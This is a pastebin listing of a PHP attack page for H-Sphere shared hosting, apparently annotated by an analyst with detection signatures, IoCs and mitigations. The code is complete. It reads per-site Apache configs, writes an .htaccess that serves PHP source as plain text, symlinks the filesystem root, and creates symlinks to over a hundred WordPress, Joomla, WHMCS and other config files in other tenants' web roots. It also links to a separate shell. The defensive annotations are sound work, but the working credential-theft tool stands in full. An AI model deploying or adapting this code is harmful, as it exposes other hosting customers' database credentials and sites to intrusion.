0xspade

HSphere Priv8 Symlink Bypasser

Sep 5th, 2016
  1. <?php
  // Analyst summary: PHP web page aimed at H-Sphere shared hosting. It reads the
  // per-site Apache configs under /hsphere/local/config/httpd/sites/ and uses
  // symlinks plus a permissive .htaccess to expose other tenants' document roots
  // and application config files through the web server.
  // Defensive relevance: the technique depends on (a) tenant PHP being able to
  // read that config directory and call symlink(), and (b) .htaccess being allowed
  // to set Options/AddType/AddHandler. open_basedir, disable_functions and a
  // narrower AllowOverride are the usual controls for those preconditions.
  // The two lines below are commented-out error suppression.
  2. //@error_reporting(0);
  3. //@ini_set("display_errors", 0);
  // Directory-listing helper.
  // Returns the scandir() result for $path when it is truthy. Otherwise it falls
  // back to opendir()/readdir() - presumably for hosts where scandir() is not
  // usable. The fallback opens '.' (the current working directory), not $path,
  // and filters out "." and "..", whereas the scandir() result keeps them.
  // Returns false when neither call succeeds.
  4. function scand( $path )
  5. {
  6.     if ( $d = scandir($path) )
  7.     {
  8.         return $d;
  // Unreachable: this statement follows the return above.
  9.         echo 'scandir';
  10.     }
  11.     elseif ($handle = opendir('.')) {
  12.         $d = array();
  // readdir() returns false at end of directory, hence the strict comparison.
  13.         while (false !== ($entry = readdir($handle))) {
  14.             if ($entry != "." && $entry != "..") {
  15.                 $d[] = $entry;
  16.             }
  17.         }
  18.         closedir($handle);
  19.         return $d;
  20.     }
  21.     return false;
  22. }
  // Emits the page header: title, inline CSS, a POST form whose only field is the
  // submit button "priv9config", and the header row of the results table
  // (SITE / USER / SYMLINK / SH3LL).
  // For hunting: the title string, the "priv9config" field name and the
  // "GrapConfigs" button value are stable content signatures for this file
  // when scanning web roots or inspecting POST bodies in access logs.
  23. echo "<HTML>
  24. <head>
  25. <title>3Turr - Priv8 HsphereSym&Config bypasser</title>
  26. <link rel='shortcut icon' type='image/x-icon' href='https://avatars1.githubusercontent.com/u/13343571?v=3&s=460'>
  27. <style>
  28. a:link {color:white;}
  29. a:visited {color:red;}
  30. a:hover {color:red;}
  31. a:active {color:white;}
  32. table tr:hover{background-color:#730000;}
  33. table tr:hover{background-color:#730000;}
  34. input { background-color:#222222; border-radius:7px; -moz-border-radius:10px; border-color:#00FFFF; width:100px; color:#00FFFF ;}
  35.  
  36. </style>
  37.  
  38. </head>
  39. <body style='background-color:black;color:#00FFFF' ><center>
  40. <h1>3<font style='color:red'>Turr</font> ~ Priv8 HsphereSym&Config bypasser </h1>
  41. <a  target='_blank' href='http://turr.x10.mx/' >3Turr</a>
  42. <form method=POST><input type=submit name=priv9config value=GrapConfigs /></form>
  43. <hr>
  44. <table border='1' style='border-color:red;'>
  45. <tr>
  46. <td>SITE</td>
  47. <td>USER</td>
  48. <td>SYMLINK</td>
  49. <td>SH3LL</td>
  50. </tr>";
  51.  
  // Creates a working directory "TurrHSphere" (requested mode 0777) next to the
  // script and switches into it; "@" hides any failure of either call.
  52. @mkdir("TurrHSphere", 0777);
  53. @chdir("TurrHSphere");
  // .htaccess written into that directory. It turns on directory indexes and
  // symlink following, and re-types .php and .html as text/plain with non-PHP
  // handlers - presumably so that symlinked PHP files are returned as source
  // rather than executed.
  // Detection: an unexpected .htaccess in a tenant web root that combines
  // "Options +FollowSymLinks" with "AddType text/plain .php", or a directory
  // named TurrHSphere.
  // Mitigation: an AllowOverride setting that does not grant Options and FileInfo
  // keeps these directives from taking effect. SymLinksIfOwnerMatch narrows
  // symlink following, but Apache's documentation notes it is subject to race
  // conditions and should not be treated as a security boundary on its own.
  54. $htaccess = "#H-Sphere 3Turr Priv8
  55. Options all
  56. Options +Indexes
  57. Options +FollowSymLinks
  58. DirectoryIndex 3Turr.Priv8
  59. AddType text/plain .php
  60. AddHandler server-parsed .php
  61. AddType text/plain .html
  62. AddHandler txt .html";
  // The return value is not checked, so a failed write goes unnoticed.
  63. file_put_contents(".htaccess", $htaccess);
  64.  
  65.  
  // $configs: relative paths, under a site's document root, of configuration files
  // for common web applications (the names match WordPress, Joomla, WHMCS,
  // osCommerce/Zen Cart, SMF, vBulletin and Drupal-style layouts, among others).
  // Such files typically hold database credentials, which is why they should not
  // be readable by other tenants or by the shared web-server account.
  66. $configs = array('/includes/configure.php', '/os/includes/configure.php', '/oscom/includes/configure.php', '/oscommerce/includes/configure.php', '/oscommerces/includes/configure.php', '/shop/includes/configure.php', '/shopping/includes/configure.php', '/sale/includes/configure.php', '/amember/config.TXT.php', '/config.TXT.php', '/members/configuration.php', '/config.php', '/forum/includes/config.php', '/forums/includes/config.php', '/admin/conf.php', '/admin/config.php', '/wp-config.php', '/wp/wp-config.php', '/WP/wp-config.php', '/wp/beta/wp-config.php', '/beta/wp-config.php', '/press/wp-config.php', '/wordpress/wp-config.php', '/Wordpress/wp-config.php', '/blog/wp-config.php', '/wordpress/beta/wp-config.php', '/news/wp-config.php', '/new/wp-config.php', '/blog/wp-config.php', '/beta/wp-config.php', '/blogs/wp-config.php', '/home/wp-config.php', '/protal/wp-config.php', '/site/wp-config.php', '/main/wp-config.php', '/test/wp-config.php', '/arcade/functions/dbclass.php', '/joomla/configuration.php', '/protal/configuration.php', '/joo/configuration.php', '/cms/configuration.php', '/site/configuration.php', '/main/configuration.php', '/news/configuration.php', '/new/configuration.php', '/home/configuration.php', '/vb/includes/config.php', '/vb3/includes/config.php', '/cc/includes/config.php', '/includes/config.php', '/configuration.php', '/includes/dist-configure.php', '/zencart/includes/dist-configure.php', '/shop/includes/dist-configure.php', '/Settings.php', '/smf/Settings.php', '/forum/Settings.php', '/forums/Settings.php', '/upload/includes/config.php', '/article/config.php', '/up/includes/config.php', '/conf_global.php', '/include/db.php', '/connect.php', '/mk_conf.php', '/includes/config.php', '/config.php', '/sites/default/settings.php', '/sites/default/dbconfig.php', '/member/configuration.php', '/supports/includes/iso4217.php', '/client/includes/iso4217.php', '/support/includes/iso4217.php', '/billing/includes/iso4217.php', 
'/billings/includes/iso4217.php', '/host/includes/iso4217.php', '/hosts/includes/iso4217.php', '/hosting/includes/iso4217.php', '/hostings/includes/iso4217.php', '/includes/iso4217.php', '/hostbills/includes/iso4217.php', '/hostbill/includes/iso4217.php', '/cart/configuration.php', '/hosting/configuration.php', '/buy/configuration.php', '/checkout/configuration.php', '/host/configuration.php', '/shop/configuration.php', '/shopping/configuration.php', '/sale/configuration.php', '/client/configuration.php', '/support/configuration.php', '/clientsupport/configuration.php', '/whm/whmcs/configuration.php', '/whm/WHMCS/configuration.php', '/whmc/WHM/configuration.php', '/whmcs/configuration.php', '/supp/configuration.php', '/secure/configuration.php', '/secure/whm/configuration.php', '/secure/whmcs/configuration.php', '/panel/configuration.php', '/hosts/configuration.php', '/submitticket.php', '/clients/configuration.php', '/clientes/configuration.php', '/cliente/configuration.php', '/billing/configuration.php', '/manage/configuration.php', '/my/configuration.php', '/myshop/configuration.php', '/billings/configuration.php', '/supports/configuration.php', '/auto/configuration.php', '/go/configuration.php', '/bill/configuration.php', '/payment/configuration.php', '/pay/configuration.php', '/purchase/configuration.php', '/clientarea/configuration.php', '/autobuy/configuration.php' );
  // Directory whose entries are listed and later read one by one as per-site
  // Apache configuration. The whole script depends on tenant PHP being able to
  // list and read it; file permissions or open_basedir that exclude this path
  // remove that precondition.
  67. $path = "/hsphere/local/config/httpd/sites/";
  // $files is an array of entry names, or false if the listing failed.
  68. $files = scand($path);
  69.  
  // When the form was submitted (POST field "priv9config" present), print a link
  // to ./TurrHSphere/, the directory this script created earlier. Only the
  // presence of the field is checked, not its value.
  70. if(isset($_POST['priv9config']))
  71. {
  72.     echo "<br><a style='size:18' target='_blank' href='./TurrHSphere/' >Priv8C0nFigs</a><br>";
  73. }
  74.  
  // Creates a symlink named ROOT.php in the current working directory that points
  // at the filesystem root; "@" hides failures.
  // IoC: a symlink to "/" inside a web-served directory. Where tenant PHP has no
  // legitimate need for symlink(), listing it in disable_functions blocks this step.
  75. @symlink('/', 'ROOT.php');
  // Iterates the listing from index 2 - presumably to skip the "." and ".."
  // entries that a sorted scandir() result starts with.
  76. for( $i=2; $i<count($files);$i++ )
  77. {
  // Reads one per-site config file; the result is not checked before matching.
  78.     $content = file_get_contents($path.$files[$i]);
  // Captures the values after DocumentRoot and ServerName and the first word after
  // "Use UserGroup". Files whose name contains ".bad" are skipped.
  79.     if ( preg_match( '/DocumentRoot(.*?)\\n.*?ServerName(.*?)\\n.*?Use UserGroup (.*?) /uis', $content, $m ) && !preg_match( '/\.bad/ui', $files[$i] ) )
  80.     {
  81.         $pwd = trim( $m[1] );
  82.         $domain = trim( $m[2] );
  83.         $user = trim( $m[3] );
  84.         if(isset($_POST['priv9config']))
  85.         {
  // For every candidate path in $configs, attempts a symlink in the working
  // directory named "<user>-<random 1..9999>.TXT" that points at
  // <DocumentRoot>/<path>. Failures are suppressed, so most links may dangle.
  // IoC: a directory full of symlinks with that naming pattern whose targets
  // lie in other accounts' document roots.
  86.             for($x=0;$x<count($configs);$x++ )
  87.             {
  88.                 @symlink($pwd.'/'.$configs[$x], $user . '-'.rand(1,9999).'.TXT' );
  89.             }
  90.         }
  // One table row per matched site: a link to the domain, the user name, a link
  // through ROOT.php to that site's document root, and a link to
  // ./3Turr.php?c=<base64 of the document root>. 3Turr.php is not part of this
  // listing. Values taken from the config files are written into the HTML
  // without escaping.
  // IoC in access logs: requests under /TurrHSphere/ROOT.php/ and requests to
  // 3Turr.php carrying a "c" query parameter.
  91.         echo "<tr><td><a  target='_blank' href='http://".$domain."/' >".$domain."</a></td>".
  92.         "<td>".$user."</td>".
  93.         "<td><a  target='_blank' href='./TurrHSphere/ROOT.php".$pwd."' >SymLink</a></td>".
  94.         "<td><a  target='_blank' href='./3Turr.php?c=".base64_encode($pwd)."' >Sh3ll</a></td></tr>";
  95.     }
  96. }
  97.  
  // Closes the results table opened in the page header.
  98. echo "</table>";